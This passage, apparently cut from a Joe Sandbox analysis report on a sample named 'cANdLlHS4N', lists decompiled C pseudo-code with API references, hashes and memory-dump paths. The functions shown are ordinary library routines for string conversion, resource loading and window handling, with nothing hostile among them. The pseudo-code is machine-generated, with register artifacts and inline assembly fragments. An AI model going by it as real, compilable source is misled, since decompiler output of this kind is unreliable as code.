      				if(_a4 == 0 || _a8 == 0) {
      					L7:
      					_t12 = 0;
      				} else {
      					_t13 = MultiByteToWideChar(3, 0, _a4, _a8, 0, 0);
      					_t21 = _t13;
      					if(_a8 == 0xffffffff) {
      						_t6 = _t21 - 1; // -1
      						_t13 = _t6;
      					}
      					__imp__#4(0, _t13);
      					_v8 = _t13;
      					if(_t13 == 0 || MultiByteToWideChar(3, 0, _a4, _a8, _t13, _t21) == _t21) {
      						_t12 = _v8;
      					} else {
      						__imp__#6(_v8);
      						goto L7;
      					}
      				}
      				return _t12;
      			}

      APIs
      • MultiByteToWideChar.KERNEL32(00000003,00000000,?,?,00000000,00000000), ref: 009B1FD6
      • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 009B1FE5
      • MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000), ref: 009B1FFD
      • SysFreeString.OLEAUT32(?), ref: 009B2006
      Yara matches
      Similarity
      • API ID: ByteCharMultiStringWide$AllocFree
      • String ID:
      • API String ID: 447844807-0
      • Opcode ID: d5dc8fe60fb6a784f148259a0129628bd88599fb9c32c708814932e82f586c6f
      • Instruction ID: 477dd77051ba499d3c3c9501a78b719d67c3bf3c1b16e6796cccfe22dbb3e339
      • Opcode Fuzzy Hash: d5dc8fe60fb6a784f148259a0129628bd88599fb9c32c708814932e82f586c6f
      • Instruction Fuzzy Hash: F5014B7250010DFFEB219FE0DE84DEABBADEB487A1B148126F61596050D2319E41DB60
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 85%
      			E009B0230(intOrPtr __ecx, void* __edx, void* __fp0, CHAR* _a4) {
      				intOrPtr _v8;
      				void* __ebx;
      				void* __edi;
      				void* __esi;
      				void* __ebp;
      				void* _t7;
      				struct HRSRC__* _t10;
      				void* _t13;
      				void* _t17;
      				void* _t19;
      				struct HINSTANCE__* _t21;
      				void* _t22;
      				void* _t29;
      
      				_t29 = __fp0;
      				_t17 = __edx;
      				_push(__ecx);
      				_push(_t21);
      				_t13 = 0;
      				_t19 = 0;
      				_v8 = __ecx;
      				_t24 = _a4;
      				if(_a4 == 0) {
      					L4:
      					_push(_t19);
      					_t22 = L009AFD35(_t13, _v8, _t17, _t19, _t21, _t26, _t29);
      					if(_t19 != 0 && _t13 != 0) {
      						FreeResource(_t13);
      					}
      					_t7 = _t22;
      				} else {
      					_t21 =  *(E009BD77F(0, 0, _t21, _t24) + 0xc);
      					_t10 = FindResourceA(_t21, _a4, 0xf0);
      					if(_t10 == 0) {
      						goto L4;
      					} else {
      						_t7 = LoadResource(_t21, _t10);
      						_t13 = _t7;
      						_t26 = _t13;
      						if(_t13 != 0) {
      							_t19 = LockResource(_t13);
      							goto L4;
      						}
      					}
      				}
      				return _t7;
      			}

      APIs
      • FindResourceA.KERNEL32(?,?,000000F0), ref: 009B0256
      • LoadResource.KERNEL32(?,00000000), ref: 009B0262
      • LockResource.KERNEL32(00000000), ref: 009B026F
      • FreeResource.KERNEL32(00000000,00000000), ref: 009B028B
      Yara matches
      Similarity
      • API ID: Resource$FindFreeLoadLock
      • String ID:
      • API String ID: 1078018258-0
      • Opcode ID: 4601db2976df4ab1c72e52d0bf213a1e3a831b98a8d176d039e00c01e0f3c9d9
      • Instruction ID: afe78e73138ffde233ebd7f408170efaa99eae63e02aba41a8b07de5a5f89451
      • Opcode Fuzzy Hash: 4601db2976df4ab1c72e52d0bf213a1e3a831b98a8d176d039e00c01e0f3c9d9
      • Instruction Fuzzy Hash: 4DF0C876601301AB87119FE59ECCAAF77ACDFC57707054039FA1693211DF70DD058660
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E009B0E11(void* __ebx, void* __ecx, void* __edx) {
      				void* _t24;
      				void* _t28;
      
      				_t24 = __edx;
      				_t22 = __ecx;
      				_t21 = __ebx;
      				_t28 = __ecx;
      				if( *((intOrPtr*)(__ecx + 0x6c)) != 0) {
      					goto ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x6c)))) + 0xb0)));
      				}
      				if(E009AC90B(__ebx, _t22, _t24, GetParent( *(__ecx + 0x20))) != 0) {
      					_t22 = E009AC90B(__ebx, _t22, _t24, GetParent( *(_t28 + 0x20)));
      					if(E009AB40F(_t16) != 0) {
      						_t22 = E009AC90B(__ebx, _t22, _t24, GetParent( *(_t28 + 0x20)));
      						 *(E009AB40F(_t19) + 0x70) =  *(_t20 + 0x70) & 0x00000000;
      					}
      				}
      				return E009AC90B(_t21, _t22, _t24, SetFocus( *(_t28 + 0x20)));
      			}

      APIs
      Yara matches
      Similarity
      • API ID: Parent$Focus
      • String ID:
      • API String ID: 384096180-0
      • Opcode ID: 64a24889ca6f7b49e26506bd34a3df00c204170628028fbbe5635005aa6bc49a
      • Instruction ID: 631d144af2eb138a63d592f0afebb492ea4f125865932a08df7a80723456eac6
      • Opcode Fuzzy Hash: 64a24889ca6f7b49e26506bd34a3df00c204170628028fbbe5635005aa6bc49a
      • Instruction Fuzzy Hash: 2DF0FFB25107089BCB207B72DD08B5B77EABFC5320F050C69E58687565DB35E842CE50
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 80%
      			E009B1147(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
      				int _t24;
      				int _t26;
      				void* _t40;
      
      				_push(4);
      				E00AAD232(0xac8b12, __ebx, __edi, __esi);
      				if( *((intOrPtr*)(__ecx + 0x6c)) != 0) {
      					E009A5D70(_t40 - 0x10, __edx, E009B9D52());
      					 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
      					_push(_t40 - 0x10);
      					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x6c)))) + 0x8c))();
      					E009A6677( *((intOrPtr*)(__ecx + 0x6c)), E00AAF0A3( *(_t40 + 8),  *(_t40 + 0xc),  *((intOrPtr*)(_t40 - 0x10)), 0xffffffff));
      					_t24 = lstrlenA( *(_t40 + 8));
      					E009A5510( *((intOrPtr*)(_t40 - 0x10)) + 0xfffffff0, _t40 - 0x10);
      					_t26 = _t24;
      				} else {
      					_t26 = GetWindowTextA( *(__ecx + 0x20),  *(_t40 + 8),  *(_t40 + 0xc));
      				}
      				return E00AAD30A(_t26);
      			}

      APIs
      Yara matches
      Similarity
      • API ID: H_prolog3TextWindow__cftoflstrlen
      • String ID:
      • API String ID: 3010948398-0
      • Opcode ID: b091ab0dfb9d12955d16e46991aec83c4bd3aadb0aa9e089845adab670f64fed
      • Instruction ID: 956e5bf1219d11ef146ab7c5ae3163197738c0df39855fb25ca529e6144b07b1
      • Opcode Fuzzy Hash: b091ab0dfb9d12955d16e46991aec83c4bd3aadb0aa9e089845adab670f64fed
      • Instruction Fuzzy Hash: 3C014B76500514AFCF05AFA4CD09BAE7BB5BF45320F408A28F6625B2E2DB329910DB90
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 73%
      			E009B4FF7(intOrPtr __ecx, void* __edx, void* __eflags, CHAR* _a4, intOrPtr _a8) {
      				intOrPtr _v8;
      				void* __ebx;
      				void* __edi;
      				void* __esi;
      				void* __ebp;
      				void* _t9;
      				void* _t14;
      				void* _t18;
      				void* _t19;
      				void* _t20;
      				void* _t22;
      				struct HINSTANCE__* _t23;
      
      				_t18 = __edx;
      				_push(__ecx);
      				_push(_t22);
      				_push(_t19);
      				_v8 = __ecx;
      				_t14 = 0;
      				_t23 =  *(E009BD77F(0, _t19, _t22, __eflags) + 0xc);
      				_t20 = LoadResource(_t23, FindResourceA(_t23, _a4, 5));
      				_t27 = _t20;
      				if(_t20 != 0) {
      					_t14 = LockResource(_t20);
      				}
      				_t9 = E009B4C39(_t14, _v8, _t18, _t20, _t23, _t27, _t14, _a8, _t23);
      				FreeResource(_t20);
      				return _t9;
      			}

      APIs
      • FindResourceA.KERNEL32(?,?,00000005), ref: 009B5013
      • LoadResource.KERNEL32(?,00000000), ref: 009B501B
      • LockResource.KERNEL32(00000000), ref: 009B5028
      • FreeResource.KERNEL32(00000000,00000000,?,?), ref: 009B5040
      Yara matches
      Similarity
      • API ID: Resource$FindFreeLoadLock
      • String ID:
      • API String ID: 1078018258-0
      • Opcode ID: bef530d22d6d61106ba11b4609661242e4b681a0bc052c100ba31f246ac3544a
      • Instruction ID: f7f3e2437b6461303d0c4d087129cc1a2303ea326f7b4369e4de841662ef185d
      • Opcode Fuzzy Hash: bef530d22d6d61106ba11b4609661242e4b681a0bc052c100ba31f246ac3544a
      • Instruction Fuzzy Hash: 00F0B476102214BBC701ABE59D49DDFBBADDF997B17014016F50693212DA74DD018BA0
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E009B4F63(void* __edx) {
      				intOrPtr _t16;
      				struct HWND__* _t19;
      				intOrPtr _t23;
      				void* _t27;
      				intOrPtr* _t29;
      				void* _t30;
      
      				_t27 = __edx;
      				_t29 =  *((intOrPtr*)(_t30 - 0x20));
      				_t23 =  *((intOrPtr*)(_t30 - 0x24));
      				if( *((intOrPtr*)(_t30 - 0x28)) != 0) {
      					E009B0C13(_t23, 1);
      				}
      				if( *((intOrPtr*)(_t30 - 0x2c)) != 0) {
      					EnableWindow( *(_t30 - 0x14), 1);
      				}
      				if( *(_t30 - 0x14) != 0) {
      					_t19 = GetActiveWindow();
      					_t35 = _t19 -  *((intOrPtr*)(_t29 + 0x20));
      					if(_t19 ==  *((intOrPtr*)(_t29 + 0x20))) {
      						SetActiveWindow( *(_t30 - 0x14));
      					}
      				}
      				 *((intOrPtr*)( *_t29 + 0x60))();
      				E009B4984(_t23, _t29, _t27, 0, _t29, _t35);
      				if( *((intOrPtr*)(_t29 + 0x78)) != 0) {
      					FreeResource( *(_t30 - 0x18));
      				}
      				_t16 =  *((intOrPtr*)(_t29 + 0x60));
      				return E00AAD30A(_t16);
      			}

      APIs
      • EnableWindow.USER32(?,00000001), ref: 009B4F83
      • GetActiveWindow.USER32 ref: 009B4F8E
      • SetActiveWindow.USER32(?,?,00000024,009A4695,3A0E8B0C), ref: 009B4F9C
      • FreeResource.KERNEL32(?,?,00000024,009A4695,3A0E8B0C), ref: 009B4FB8
        • Part of subcall function 009B0C13: EnableWindow.USER32(?,009A4695), ref: 009B0C24
      Yara matches
      Similarity
      • API ID: Window$ActiveEnable$FreeResource
      • String ID:
      • API String ID: 253586258-0
      • Opcode ID: 6aed3026ac0070cace6e0e261fe945012673458a89e40404fd2c6d6cdfe1aef0
      • Instruction ID: 55a422ce984aaa33ab503244e94eaad1af71bfd37bda07ab604a9f56481de1ce
      • Opcode Fuzzy Hash: 6aed3026ac0070cace6e0e261fe945012673458a89e40404fd2c6d6cdfe1aef0
      • Instruction Fuzzy Hash: 79F04F34A00608CBCF21EBA4CA455EDBBB6FF88711B600129E142772A2CB315D81DF62
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E009B3218(void* __ecx, intOrPtr _a4) {
      				intOrPtr _t10;
      				void* _t12;
      
      				_t12 = __ecx;
      				E00AAB4AB( *((intOrPtr*)(__ecx + 0x58)));
      				 *((intOrPtr*)(_t12 + 0x58)) = E00AAF4C4(_a4);
      				E00AAB4AB( *((intOrPtr*)(_t12 + 0x6c)));
      				_t10 = E00AAF4C4( *((intOrPtr*)(_t12 + 0x50)));
      				 *((intOrPtr*)(_t12 + 0x6c)) = _t10;
      				return _t10;
      			}

      APIs
      • _free.LIBCMT ref: 009B3223
        • Part of subcall function 00AAB4AB: HeapFree.KERNEL32(00000000,00000000,?,00AAAEFC,?), ref: 00AAB4C1
        • Part of subcall function 00AAB4AB: GetLastError.KERNEL32(?,?,00AAAEFC,?), ref: 00AAB4D3
      • __strdup.LIBCMT ref: 009B322B
      • _free.LIBCMT ref: 009B3236
      • __strdup.LIBCMT ref: 009B323E
        • Part of subcall function 00AAF4C4: _strlen.LIBCMT ref: 00AAF4DA
        • Part of subcall function 00AAF4C4: _malloc.LIBCMT ref: 00AAF4E3
        • Part of subcall function 00AAF4C4: _strcpy_s.LIBCMT ref: 00AAF4F5
      Yara matches
      Similarity
      • API ID: __strdup_free$ErrorFreeHeapLast_malloc_strcpy_s_strlen
      • String ID:
      • API String ID: 2371051941-0
      • Opcode ID: 4d2df8bda681c98edc494ca8d381bc119e034c044b4dac1a79fb45ddd33e505c
      • Instruction ID: 432a2250cd60a3009b7219e26843b8a9052c86822addb055b7a1fdd2f757c412
      • Opcode Fuzzy Hash: 4d2df8bda681c98edc494ca8d381bc119e034c044b4dac1a79fb45ddd33e505c
      • Instruction Fuzzy Hash: 8AE012724107446FC721BBB5CD02857BB95EF463247408C3FF58553673DBB2A8619B90
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E009A2E10(signed int __ecx, intOrPtr _a4, intOrPtr _a8) {
      				intOrPtr _t12;
      				char* _t19;
      				intOrPtr _t23;
      				intOrPtr _t27;
      				intOrPtr _t32;
      				intOrPtr* _t37;
      
      				_t23 = _a4;
      				_t37 = __ecx;
      				_t12 =  *((intOrPtr*)(__ecx + 0x10));
      				if((__ecx | 0xffffffff) - _t12 <= _t23) {
      					_t12 = E00AC61C7("string too long");
      				}
      				if(_t23 == 0) {
      					L15:
      					return _t37;
      				} else {
      					_t32 = _t12 + _t23;
      					if(_t32 > 0xfffffffe) {
      						_t12 = E00AC61C7("string too long");
      					}
      					_t27 =  *((intOrPtr*)(_t37 + 0x14));
      					if(_t27 >= _t32) {
      						if(_t32 != 0) {
      							goto L7;
      						} else {
      							 *((intOrPtr*)(_t37 + 0x10)) = _t32;
      							if(_t27 < 0x10) {
      								_t19 = _t37;
      								 *_t19 = 0;
      								return _t19;
      							} else {
      								 *((char*)( *_t37)) = 0;
      								return _t37;
      							}
      						}
      					} else {
      						E009A2470(_t37, _t32, _t12);
      						if(_t32 == 0) {
      							L14:
      							goto L15;
      						} else {
      							L7:
      							E009A1F50(_t37,  *((intOrPtr*)(_t37 + 0x10)), _t23, _a8);
      							 *((intOrPtr*)(_t37 + 0x10)) = _t32;
      							if( *((intOrPtr*)(_t37 + 0x14)) < 0x10) {
      								 *((char*)(_t37 + _t32)) = 0;
      								goto L14;
      							} else {
      								 *((char*)( *_t37 + _t32)) = 0;
      								return _t37;
      							}
      						}
      					}
      				}
      			}

      Statement addresses (listing order; 0x00000000 where the decompiler assigned no address): 0x009a2e14, 0x009a2e18, 0x009a2e1a, 0x009a2e24, 0x009a2e2b, 0x009a2e2b, 0x009a2e32, 0x009a2eb0, 0x009a2eb5, 0x009a2e34, 0x009a2e35, 0x009a2e3b, 0x009a2e42, 0x009a2e42, 0x009a2e47, 0x009a2e4c, 0x009a2e85, 0x00000000, 0x009a2e87, 0x009a2e87, 0x009a2e8d, 0x009a2e9e, 0x009a2ea1, 0x009a2ea6, 0x009a2e8f, 0x009a2e92, 0x009a2e9a, 0x009a2e9a, 0x009a2e8d, 0x009a2e4e, 0x009a2e52, 0x009a2e59, 0x009a2eaf, 0x00000000, 0x009a2e5b, 0x009a2e5b, 0x009a2e66, 0x009a2e6f, 0x009a2e72, 0x009a2eab, 0x00000000, 0x009a2e74, 0x009a2e76, 0x009a2e80, 0x009a2e80, 0x009a2e72, 0x009a2e59, 0x009a2e4c

      APIs
      • std::_Xinvalid_argument.LIBCPMT ref: 009A2E2B
        • Part of subcall function 00AC61C7: std::exception::exception.LIBCMT ref: 00AC61DC
        • Part of subcall function 00AC61C7: __CxxThrowException@8.LIBCMT ref: 00AC61F1
      • std::_Xinvalid_argument.LIBCPMT ref: 009A2E42
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Xinvalid_argumentstd::_$Exception@8Throwstd::exception::exception
      • String ID: string too long
      • API String ID: 3336028256-2556327735
      • Opcode ID: 059901c1d0bb400c835ffdbbb8ef5a866249ea41a8c1435c0f9d4c7894a8fd08
      • Instruction ID: 2569a3c2ee34debc7edf75679360469d7e39e18affe3bd8c7142b0c2bb34ccb5
      • Opcode Fuzzy Hash: 059901c1d0bb400c835ffdbbb8ef5a866249ea41a8c1435c0f9d4c7894a8fd08
      • Instruction Fuzzy Hash: DA11D6333006105BD721AB5CE880A6AF7DDEFE6721F200A1FF592C7691C7A1984483E0
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 67%
      			E009A2AD0(intOrPtr* __ecx, void* __edi, intOrPtr _a4, char _a8) {
      				signed int _t11;
      				signed int _t16;
      				intOrPtr _t19;
      				intOrPtr _t20;
      				void* _t25;
      				intOrPtr _t26;
      				intOrPtr* _t28;
      				void* _t29;
      
      				_t25 = __edi;
      				_t21 = __ecx;
      				_t19 = _a4;
      				_t28 = __ecx;
      				if(_t19 > 0xfffffffe) {
      					E00AC61C7("string too long");
      				}
      				_t11 =  *(_t28 + 0x14);
      				if(_t11 >= _t19) {
      					if(_a8 == 0 || _t19 >= 0x10) {
      						if(_t19 == 0) {
      							 *((intOrPtr*)(_t28 + 0x10)) = _t19;
      							if(_t11 >= 0x10) {
      								_t28 =  *_t28;
      							}
      							 *_t28 = 0;
      						}
      						asm("sbb eax, eax");
      						return  ~_t11;
      					} else {
      						_push(_t25);
      						_t26 =  *((intOrPtr*)(_t28 + 0x10));
      						if(_t19 < _t26) {
      							_t26 = _t19;
      						}
      						if(_t11 >= 0x10) {
      							_t20 =  *_t28;
      							if(_t26 != 0) {
      								E00AAB080(_t28, _t20, _t26);
      								_t29 = _t29 + 0xc;
      							}
      							_push(_t20);
      							_t11 = E009A62C0();
      							_t19 = _a4;
      						}
      						 *((intOrPtr*)(_t28 + 0x10)) = _t26;
      						 *(_t28 + 0x14) = 0xf;
      						 *((char*)(_t26 + _t28)) = 0;
      						asm("sbb eax, eax");
      						return  ~_t11;
      					}
      				} else {
      					_t16 = E009A2470(_t21, _t19,  *((intOrPtr*)(_t28 + 0x10)));
      					asm("sbb eax, eax");
      					return  ~_t16;
      				}
      			}

      Statement addresses (listing order; 0x00000000 where the decompiler assigned no address): 0x009a2ad0, 0x009a2ad0, 0x009a2ad4, 0x009a2ad8, 0x009a2add, 0x009a2ae4, 0x009a2ae4, 0x009a2ae9, 0x009a2aee, 0x009a2b0c, 0x009a2b5e, 0x009a2b60, 0x009a2b66, 0x009a2b68, 0x009a2b68, 0x009a2b6a, 0x009a2b6a, 0x009a2b71, 0x009a2b78, 0x009a2b13, 0x009a2b13, 0x009a2b14, 0x009a2b19, 0x009a2b1b, 0x009a2b1b, 0x009a2b20, 0x009a2b22, 0x009a2b26, 0x009a2b2b, 0x009a2b30, 0x009a2b30, 0x009a2b33, 0x009a2b34, 0x009a2b39, 0x009a2b3c, 0x009a2b3f, 0x009a2b42, 0x009a2b4b, 0x009a2b52, 0x009a2b59, 0x009a2b59, 0x009a2af0, 0x009a2af5, 0x009a2afe, 0x009a2b05, 0x009a2b05

      APIs
      • std::_Xinvalid_argument.LIBCPMT ref: 009A2AE4
        • Part of subcall function 00AC61C7: std::exception::exception.LIBCMT ref: 00AC61DC
        • Part of subcall function 00AC61C7: __CxxThrowException@8.LIBCMT ref: 00AC61F1
      • _memmove.LIBCMT ref: 009A2B2B
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Exception@8ThrowXinvalid_argument_memmovestd::_std::exception::exception
      • String ID: string too long
      • API String ID: 22950630-2556327735
      • Opcode ID: 509454e387d5bec71a50b47151ef79a4c4ee02c3b8b355b1d3fa0977acbafe6a
      • Instruction ID: e03ee0de3c486d2cd1477ca7b8fc68a2a96fcffbf2d554886cce8125da543131
      • Opcode Fuzzy Hash: 509454e387d5bec71a50b47151ef79a4c4ee02c3b8b355b1d3fa0977acbafe6a
      • Instruction Fuzzy Hash: 4D1193721043155BEB249E7CA8C1A6BB799AB53714F240A2EE493875C2D761E84886F0
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E009A29E0(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
      				intOrPtr _t10;
      				intOrPtr _t11;
      				intOrPtr _t16;
      				intOrPtr* _t19;
      				intOrPtr _t24;
      				intOrPtr _t27;
      				intOrPtr* _t28;
      				intOrPtr _t31;
      				intOrPtr* _t34;
      
      				_t34 = __ecx;
      				_t10 =  *((intOrPtr*)(__ecx + 0x10));
      				_t24 = _a4;
      				if(_t10 < _t24) {
      					_t10 = E00AC6214("invalid string position");
      				}
      				_t31 = _a8;
      				_t11 = _t10 - _t24;
      				if(_t11 < _t31) {
      					_t31 = _t11;
      				}
      				if(_t31 == 0) {
      					L14:
      					return _t34;
      				} else {
      					_t27 =  *((intOrPtr*)(_t34 + 0x14));
      					if(_t27 < 0x10) {
      						_t19 = _t34;
      					} else {
      						_t19 =  *_t34;
      					}
      					if(_t27 < 0x10) {
      						_t28 = _t34;
      					} else {
      						_t28 =  *_t34;
      					}
      					E00AAB920(_t28 + _t24, _t19 + _t24 + _t31, _t11 - _t31);
      					_t16 =  *((intOrPtr*)(_t34 + 0x10)) - _t31;
      					 *((intOrPtr*)(_t34 + 0x10)) = _t16;
      					if( *((intOrPtr*)(_t34 + 0x14)) < 0x10) {
      						 *((char*)(_t34 + _t16)) = 0;
      						goto L14;
      					} else {
      						 *((char*)( *_t34 + _t16)) = 0;
      						return _t34;
      					}
      				}
      			}

      Statement addresses (listing order; 0x00000000 where the decompiler assigned no address): 0x009a29e4, 0x009a29e6, 0x009a29e9, 0x009a29ef, 0x009a29f6, 0x009a29f6, 0x009a29fb, 0x009a29fe, 0x009a2a02, 0x009a2a04, 0x009a2a04, 0x009a2a08, 0x009a2a5a, 0x009a2a5f, 0x009a2a0a, 0x009a2a0a, 0x009a2a11, 0x009a2a17, 0x009a2a13, 0x009a2a13, 0x009a2a13, 0x009a2a1c, 0x009a2a22, 0x009a2a1e, 0x009a2a1e, 0x009a2a1e, 0x009a2a2f, 0x009a2a3a, 0x009a2a40, 0x009a2a44, 0x009a2a56, 0x00000000, 0x009a2a46, 0x009a2a48, 0x009a2a51, 0x009a2a51, 0x009a2a44

      APIs
      • std::_Xinvalid_argument.LIBCPMT ref: 009A29F6
        • Part of subcall function 00AC6214: std::exception::exception.LIBCMT ref: 00AC6229
        • Part of subcall function 00AC6214: __CxxThrowException@8.LIBCMT ref: 00AC623E
      • _memmove.LIBCMT ref: 009A2A2F
      Strings
      • invalid string position, xrefs: 009A29F1
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Exception@8ThrowXinvalid_argument_memmovestd::_std::exception::exception
      • String ID: invalid string position
      • API String ID: 22950630-1799206989
      • Opcode ID: 9924e4c7808de36a52544d339ff2bc339ce45dc861076050e7b946cff2487efa
      • Instruction ID: 3dc2ca194054a837b28856029bf14292d1cdecd212882214f4bb77f3aa31631b
      • Opcode Fuzzy Hash: 9924e4c7808de36a52544d339ff2bc339ce45dc861076050e7b946cff2487efa
      • Instruction Fuzzy Hash: 8501D6323002418BC735CFACED8096BB3AAEB96710B24492DE185CB781D7B0EC42C7E0
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 43%
      			E009C2683(void* __ecx, intOrPtr __edx, intOrPtr __edi) {
      				signed int _v8;
      				signed short _v20;
      				signed short _v24;
      				char _v28;
      				void* __ebx;
      				void* __esi;
      				void* __ebp;
      				signed int _t9;
      				signed int _t11;
      				intOrPtr _t22;
      				intOrPtr* _t23;
      				intOrPtr _t28;
      				intOrPtr _t30;
      				signed int _t31;
      				signed int _t34;
      
      				_t29 = __edi;
      				_t28 = __edx;
      				_t9 =  *0xd0c910; // 0x3a0e8b0c
      				_v8 = _t9 ^ _t34;
      				_t11 =  *0xd08ba8; // 0x50052
      				_t37 = _t11 - 0xffffffff;
      				if(_t11 == 0xffffffff) {
      					_push(_t22);
      					_push(_t30);
      					_t23 = GetProcAddress(L009A8501( *((intOrPtr*)( *((intOrPtr*)(E009BD77F(_t22, __edi, _t30, _t37) + 0x78))))), "DllGetVersion");
      					_t31 = 0x40000;
      					if(_t23 != 0) {
      						E00AAB3F0( &_v28, 0, 0x14);
      						_push( &_v28);
      						_v28 = 0x14;
      						if( *_t23() >= 0) {
      							_t31 = (_v24 & 0x0000ffff) << 0x00000010 | _v20 & 0x0000ffff;
      						}
      					}
      					 *0xd08ba8 = _t31;
      					_t11 = _t31;
      					_pop(_t30);
      					_pop(_t22);
      				}
      				return E00AAB46A(_t11, _t22, _v8 ^ _t34, _t28, _t29, _t30);
      			}

      Statement addresses (listing order): 0x009c2683, 0x009c2683, 0x009c268b, 0x009c2692, 0x009c2695, 0x009c269a, 0x009c269d, 0x009c269f, 0x009c26a0, 0x009c26bc, 0x009c26be, 0x009c26c5, 0x009c26cf, 0x009c26da, 0x009c26db, 0x009c26e6, 0x009c26f3, 0x009c26f3, 0x009c26e6, 0x009c26f5, 0x009c26fb, 0x009c26fd, 0x009c26fe, 0x009c26fe, 0x009c270a

      APIs
      • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 009C26B6
      • _memset.LIBCMT ref: 009C26CF
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: AddressProc_memset
      • String ID: DllGetVersion
      • API String ID: 2593635937-2861820592
      • Opcode ID: dc6517d4dfbdfac82f8209bf9620c28f6987fdcef5aef1f1727908ec017e539b
